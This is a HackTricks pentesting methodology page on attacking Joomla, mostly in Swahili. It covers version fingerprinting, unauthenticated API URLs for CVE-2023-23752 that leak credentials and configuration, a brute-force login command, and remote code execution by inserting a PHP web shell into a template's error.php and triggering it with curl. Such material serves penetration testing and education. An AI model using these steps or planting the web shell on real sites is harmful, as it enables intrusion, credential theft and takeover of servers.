Joomla

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Takwimu za Joomla

Joomla inakusanya baadhi ya takwimu za matumizi zisizo na majina kama vile mgawanyiko wa toleo la Joomla, PHP na toleo la hifadhidata na mifumo ya uendeshaji ya seva inayotumika kwenye usakinishaji wa Joomla. Takwimu hizi zinaweza kuombwa kupitia API yao ya umma.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Enumeration

Discovery/Footprinting

Angalia meta

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

README.txt

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Version

Katika /administrator/manifests/files/joomla.xml unaweza kuona toleo.
Katika /language/en-GB/en-GB.xml unaweza kupata toleo la Joomla.
Katika plugins/system/cache/cache.xml unaweza kuona toleo la takriban.

Automatic

droopescan scan joomla --url http://joomla-site.local/

In 80,443 - Pentesting Web Methodology ni sehemu kuhusu skana za CMS ambazo zinaweza skana Joomla.

API Ufunuo wa Taarifa Bila Uthibitisho:

Matoleo Kutoka 4.0.0 hadi 4.2.7 yana hatari ya ufunuo wa taarifa bila uthibitisho (CVE-2023-23752) ambayo itatoa creds na taarifa nyingine.

Watumiaji: http://<host>/api/v1/users?public=true
Faili ya Mipangilio: http://<host>/api/index.php/v1/config/application?public=true

Moduli ya MSF: scanner/http/joomla_api_improper_access_checks au script ya ruby: 51334

Brute-Force

Unaweza kutumia script hii kujaribu kufanya brute force kwenye kuingia.

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

Ikiwa umeweza kupata admin credentials unaweza RCE ndani yake kwa kuongeza kipande cha PHP code ili kupata RCE. Tunaweza kufanya hivi kwa kubadilisha template.

Bonyeza kwenye Templates chini kushoto chini ya Configuration ili kuleta menyu ya templates.
Bonyeza kwenye jina la template. Tuchague protostar chini ya kichwa cha safu ya Template. Hii itatuletea kwenye ukurasa wa Templates: Customise.
Hatimaye, unaweza kubonyeza kwenye ukurasa ili kuleta page source. Tuchague ukurasa wa error.php. Tutongeza PHP one-liner ili kupata utekelezaji wa code kama ifuatavyo:
system($_GET['cmd']);
Hifadhi & Funga
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id